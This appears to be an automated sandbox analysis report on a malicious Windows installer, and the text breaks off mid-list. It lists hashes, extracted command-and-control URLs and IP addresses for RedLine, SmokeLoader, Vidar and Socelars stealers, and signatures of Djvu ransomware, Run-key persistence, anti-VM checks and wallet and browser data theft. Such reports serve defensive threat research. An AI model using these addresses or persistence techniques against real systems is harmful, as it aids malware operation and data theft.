Resubmissions
28-10-2021 15:53
211028-tbqhfabhb2 1028-10-2021 05:27
211028-f5paksheak 1027-10-2021 14:29
211027-rt28vafah7 10Analysis
-
max time kernel
899s -
max time network
1329s -
submitted
01-01-1970 00:00
Static task
static1
Behavioral task
behavioral1
Sample
setup_installer.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_installer.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_installer.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_installer.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_installer.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_installer.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
setup_installer.exe
Resource
win10-de-20210920
General
-
Target
setup_installer.exe
-
Size
4.6MB
-
MD5
b356bccf8b9aff2897ecc42970367f44
-
SHA1
fe06861ac4952834ddc290dd5e0e7f36c8adc018
-
SHA256
b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
-
SHA512
7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
chris
194.104.136.5:46013
Extracted
redline
media26
91.121.67.60:23325
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3216 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6224 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5632 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4448 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5884 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4236 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3640 2500 rundll32.exe 146 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral5/memory/3964-283-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral5/memory/3964-288-0x0000000000418D32-mapping.dmp family_redline behavioral5/memory/752-287-0x0000000000418D26-mapping.dmp family_redline behavioral5/memory/752-284-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule behavioral5/files/0x000400000001abdf-159.dat family_socelars behavioral5/files/0x000400000001abdf-183.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid Process procid_target PID 6048 created 6116 6048 WerFault.exe 173 PID 3536 created 3164 3536 WerFault.exe 147 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
regsvr32.exedescription pid Process procid_target PID 5004 created 3032 5004 regsvr32.exe 9 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral5/memory/4280-444-0x0000000002FB0000-0x0000000003086000-memory.dmp family_vidar behavioral5/memory/4280-477-0x0000000000400000-0x0000000002C15000-memory.dmp family_vidar -
Processes:
resource yara_rule behavioral5/files/0x000500000001abb8-122.dat aspack_v212_v242 behavioral5/files/0x000500000001abb8-124.dat aspack_v212_v242 behavioral5/files/0x000500000001abb6-123.dat aspack_v212_v242 behavioral5/files/0x000500000001abb6-130.dat aspack_v212_v242 behavioral5/files/0x000500000001abb6-129.dat aspack_v212_v242 behavioral5/files/0x000400000001abc0-127.dat aspack_v212_v242 behavioral5/files/0x000400000001abc0-131.dat aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
mstsc.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run mstsc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\MJULMBUP5LM = "C:\\Program Files (x86)\\O9r6hzlkh\\_jxt0z7tbh.exe" mstsc.exe -
Blocklisted process makes network request 63 IoCs
Processes:
cmd.execmd.exeMsiExec.exeflow pid Process 88 2104 cmd.exe 89 2104 cmd.exe 88 2104 cmd.exe 89 2104 cmd.exe 97 2104 cmd.exe 99 2104 cmd.exe 101 2104 cmd.exe 102 2104 cmd.exe 105 2104 cmd.exe 108 2104 cmd.exe 109 2104 cmd.exe 114 2104 cmd.exe 115 2104 cmd.exe 131 2104 cmd.exe 241 2104 cmd.exe 243 2104 cmd.exe 263 2104 cmd.exe 493 1872 cmd.exe 1028 4288 MsiExec.exe 1031 4288 MsiExec.exe 1032 4288 MsiExec.exe 1033 4288 MsiExec.exe 1034 4288 MsiExec.exe 1035 4288 MsiExec.exe 1036 4288 MsiExec.exe 1037 4288 MsiExec.exe 1038 4288 MsiExec.exe 1040 4288 MsiExec.exe 1041 4288 MsiExec.exe 1042 4288 MsiExec.exe 1043 4288 MsiExec.exe 1044 4288 MsiExec.exe 1045 4288 MsiExec.exe 1046 4288 MsiExec.exe 1047 4288 MsiExec.exe 1048 4288 MsiExec.exe 1049 4288 MsiExec.exe 1050 4288 MsiExec.exe 1052 4288 MsiExec.exe 1053 4288 MsiExec.exe 1054 4288 MsiExec.exe 1055 4288 MsiExec.exe 1056 4288 MsiExec.exe 1057 4288 MsiExec.exe 1058 4288 MsiExec.exe 1059 4288 MsiExec.exe 1060 4288 MsiExec.exe 1063 4288 MsiExec.exe 1065 4288 MsiExec.exe 1066 4288 MsiExec.exe 1068 4288 MsiExec.exe 1069 4288 MsiExec.exe 1070 4288 MsiExec.exe 1071 4288 MsiExec.exe 1072 4288 MsiExec.exe 1073 4288 MsiExec.exe 1074 4288 MsiExec.exe 1075 4288 MsiExec.exe 1076 4288 MsiExec.exe 1077 4288 MsiExec.exe 1078 4288 MsiExec.exe 1079 4288 MsiExec.exe 1080 4288 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
DYbALA.exeDYbALA.exeDYbALA.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_install.exeWed09f257bb7877d00b2.exeWed096a1bff61.exeWed09db0d52c38.exeWed09cfb2f9758281d8.exeWed09e95ff6b5.exeConhost.exeWed0971f17486f8.exeWed09d8d6edfaff2ac.exeWed09b3a5ca1a712d390.exeWed09abf83d9c2.exeWed09d27135e5a8b3b.exeWed09c42cad92c20f79.exeWed09977fdc12334.exeWed094c47c32b.exeWed09b2a8bc4f16cb.exeWed09abf83d9c2.exeWed09d27135e5a8b3b.tmpLzmwAqmV.exeWed09d27135e5a8b3b.exeBCleanSoft82.exeinst1.exeWed09d27135e5a8b3b.tmpSoft1WW02.exeWed0971f17486f8.exeWed0901eb1dae126e32.exe4.exe5.exesearch_hyperfs_206.exesetup.exereg.exe4386.exe10.exeChrome5.exe485024.exe5661510.exe838218.exe4220952.exeXYB0bVL96aEKhA.exErun.exepostback.exerun2.exeWinHoster.exeMicrosoftEdge.exe3045238.exe8467150.exe7780882.exe3898642.exe3496843.exe4437894.exe4624655.exeLzmwAqmV.exeyYo8bW5_Dr75hNsA4MSUHZEb.exeyYo8bW5_Dr75hNsA4MSUHZEb.exeConhost.exemBeq4rQAAJTfUezIixpwFY0d.execAYo3Q8suZBbt4C5trcF26B3.exea4hC89JjzvN7O07q6G1UDT5s.exeWpFILx0yw_EK8MsdJAiKhmLH.exePpZycQHNdq11TTqAPAUEHirn.exeAltrove.exe.comck_6NCtiU3bUjW3jzeMQBw0u.exec159B_KHXHENlHi35uxznXRu.exeTFugsa9rfWRW0F_k6pkijv3W.exepid Process 1380 setup_install.exe 1224 Wed09f257bb7877d00b2.exe 2392 Wed096a1bff61.exe 3652 Wed09db0d52c38.exe 3960 Wed09cfb2f9758281d8.exe 1508 Wed09e95ff6b5.exe 2328 Conhost.exe 1336 Wed0971f17486f8.exe 2420 Wed09d8d6edfaff2ac.exe 2492 Wed09b3a5ca1a712d390.exe 3168 Wed09abf83d9c2.exe 3196 Wed09d27135e5a8b3b.exe 2104 Wed09c42cad92c20f79.exe 2012 Wed09977fdc12334.exe 1764 Wed094c47c32b.exe 3908 Wed09b2a8bc4f16cb.exe 3392 Wed09abf83d9c2.exe 3724 Wed09d27135e5a8b3b.tmp 1388 LzmwAqmV.exe 2840 Wed09d27135e5a8b3b.exe 4108 BCleanSoft82.exe 4196 inst1.exe 4216 Wed09d27135e5a8b3b.tmp 4280 Soft1WW02.exe 752 Wed0971f17486f8.exe 3964 Wed0901eb1dae126e32.exe 4424 4.exe 4588 5.exe 4740 search_hyperfs_206.exe 4868 setup.exe 4972 reg.exe 5084 4386.exe 4172 10.exe 4540 Chrome5.exe 2364 485024.exe 4396 5661510.exe 4864 838218.exe 4360 4220952.exe 4352 XYB0bVL96aEKhA.exE 3164 run.exe 3640 postback.exe 1696 run2.exe 5136 WinHoster.exe 5156 MicrosoftEdge.exe 5360 3045238.exe 5544 8467150.exe 5636 7780882.exe 5836 3898642.exe 6116 3496843.exe 1228 4437894.exe 5104 4624655.exe 4100 LzmwAqmV.exe 6932 yYo8bW5_Dr75hNsA4MSUHZEb.exe 6804 yYo8bW5_Dr75hNsA4MSUHZEb.exe 5748 Conhost.exe 5616 mBeq4rQAAJTfUezIixpwFY0d.exe 6364 cAYo3Q8suZBbt4C5trcF26B3.exe 6548 a4hC89JjzvN7O07q6G1UDT5s.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 6492 PpZycQHNdq11TTqAPAUEHirn.exe 4680 Altrove.exe.com 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 3880 c159B_KHXHENlHi35uxznXRu.exe 4932 TFugsa9rfWRW0F_k6pkijv3W.exe -
Tries to connect to .bazar domain 4 IoCs
Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.
Processes:
flow ioc 834 reddew28c.bazar 835 bluehail.bazar 836 whitestorm9p.bazar 841 aqsouhyw.bazar -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
743B.exe0Bone6aXxnHu42vsLpUqYgSL.exe0Bone6aXxnHu42vsLpUqYgSL.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 743B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 743B.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Taegeguxobu.exeWed09977fdc12334.exewpbaYsMbAbjbDC4O72ATMD6h.exeCalculator.exeCalculator.exeCalculator.exeJocaezhagiba.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Taegeguxobu.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Wed09977fdc12334.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation wpbaYsMbAbjbDC4O72ATMD6h.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Jocaezhagiba.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeWed09d27135e5a8b3b.tmpWed09d27135e5a8b3b.tmp4386.exerundll32.exetaskkill.exerundll32.exemsiexec.exesetup.exemBeq4rQAAJTfUezIixpwFY0d.exemBeq4rQAAJTfUezIixpwFY0d.exeCalculator.exeC71D.exeU_tSRTpe9iuHA7rySgKJYnb3.tmpx9ASqAjzf_Bbkm30Jcu897HP.exeCalculator.exeCalculator.exeD305.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exepid Process 1380 setup_install.exe 1380 setup_install.exe 1380 setup_install.exe 1380 setup_install.exe 1380 setup_install.exe 1380 setup_install.exe 3724 Wed09d27135e5a8b3b.tmp 4216 Wed09d27135e5a8b3b.tmp 5084 4386.exe 5084 4386.exe 2812 rundll32.exe 6568 taskkill.exe 6568 taskkill.exe 6268 rundll32.exe 5084 4386.exe 5084 4386.exe 5084 4386.exe 5932 msiexec.exe 5932 msiexec.exe 6592 setup.exe 6592 setup.exe 5616 mBeq4rQAAJTfUezIixpwFY0d.exe 5616 mBeq4rQAAJTfUezIixpwFY0d.exe 6004 mBeq4rQAAJTfUezIixpwFY0d.exe 6004 mBeq4rQAAJTfUezIixpwFY0d.exe 6592 setup.exe 6592 setup.exe 6592 setup.exe 5168 Calculator.exe 5912 C71D.exe 5168 Calculator.exe 5168 Calculator.exe 4564 U_tSRTpe9iuHA7rySgKJYnb3.tmp 1184 x9ASqAjzf_Bbkm30Jcu897HP.exe 1184 x9ASqAjzf_Bbkm30Jcu897HP.exe 5252 Calculator.exe 3876 Calculator.exe 5008 D305.exe 5008 D305.exe 6592 setup.exe 1184 x9ASqAjzf_Bbkm30Jcu897HP.exe 7340 Calculator.exe 7340 Calculator.exe 7340 Calculator.exe 7356 Calculator.exe 7348 Calculator.exe 7348 Calculator.exe 7356 Calculator.exe 7348 Calculator.exe 7356 Calculator.exe 7468 Calculator.exe 7468 Calculator.exe 7468 Calculator.exe 7468 Calculator.exe 7484 Calculator.exe 7484 Calculator.exe 7484 Calculator.exe 7484 Calculator.exe 5084 4386.exe 7340 Calculator.exe 1184 x9ASqAjzf_Bbkm30Jcu897HP.exe 8076 Calculator.exe 8076 Calculator.exe 8076 Calculator.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
PpZycQHNdq11TTqAPAUEHirn.exesetup.exeDYbALA.exebuild3.exe4220952.exeDYbALA.exeB0DE.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" PpZycQHNdq11TTqAPAUEHirn.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\SHaefasotega.exe\"" DYbALA.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run build3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" build3.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4220952.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce PpZycQHNdq11TTqAPAUEHirn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Dedyfilytu.exe\"" DYbALA.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a10ad8b7-4b73-4fc7-be07-0e91604e81ac\\B0DE.exe\" --AutoStart" B0DE.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
search_hyperfs_206.exeUx7B70MQMWMvzY_raGDAzZ3z.exeinstaller.exeCalculator.exefoldershare.exePpZycQHNdq11TTqAPAUEHirn.exe0Bone6aXxnHu42vsLpUqYgSL.exeCGDdIXA0PUg531oqccqn7mSz.exePevlGZ3PxwUKzaOKeJMTqLD6.exeuX3Qqm8F5HavxjTh58PMEXEs.tmpWadykerulu.exeinstaller.exefoldershare.exeWed09d27135e5a8b3b.tmpmshta.exeWed09e95ff6b5.exeCalculator.exemshta.exeinstaller.exemshta.exeJaiWjlrNxwqygP7FOh0EGpEb.tmpbuild3.exeCulaqaecijy.exeAltrove.exe.compostback.exerundll32.exeLzmwAqmV.exemshta.exejg1_1faf.exe743B.exeXYB0bVL96aEKhA.exEa4hC89JjzvN7O07q6G1UDT5s.exemshta.exeCezhenipoly.execmd.exemshta.exesetup.exemshta.exe0Bone6aXxnHu42vsLpUqYgSL.exeU_tSRTpe9iuHA7rySgKJYnb3.tmpmshta.exekPBhgOaGQk.exemshta.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA search_hyperfs_206.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ux7B70MQMWMvzY_raGDAzZ3z.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA installer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA foldershare.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PpZycQHNdq11TTqAPAUEHirn.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CGDdIXA0PUg531oqccqn7mSz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PevlGZ3PxwUKzaOKeJMTqLD6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA uX3Qqm8F5HavxjTh58PMEXEs.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wadykerulu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA installer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA foldershare.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wed09d27135e5a8b3b.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wed09e95ff6b5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA installer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA JaiWjlrNxwqygP7FOh0EGpEb.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA build3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Culaqaecijy.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Altrove.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA postback.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LzmwAqmV.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 743B.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XYB0bVL96aEKhA.exE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA a4hC89JjzvN7O07q6G1UDT5s.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Cezhenipoly.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA U_tSRTpe9iuHA7rySgKJYnb3.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exedescription ioc Process File opened (read-only) \??\T: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\J: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 20 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 295 ipinfo.io 614 ipinfo.io 801 api.2ip.ua 136 ipinfo.io 137 ipinfo.io 293 ipinfo.io 100 freegeoip.app 109 freegeoip.app 105 freegeoip.app 294 ipinfo.io 425 ipinfo.io 617 ipinfo.io 8 ip-api.com 102 freegeoip.app 613 ipinfo.io 618 ipinfo.io 777 api.2ip.ua 778 api.2ip.ua 138 ipinfo.io 412 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 26 IoCs
Processes:
svchost.exesvchost.exedescription ioc Process File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 98CD429E44C7BD38 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{D150A421-63CD-46E4-ADDB-794A26A5C800} svchost.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\sqtvvs.exe svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 72F17FB9DDB14373 svchost.exe File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F svchost.exe File opened for modification 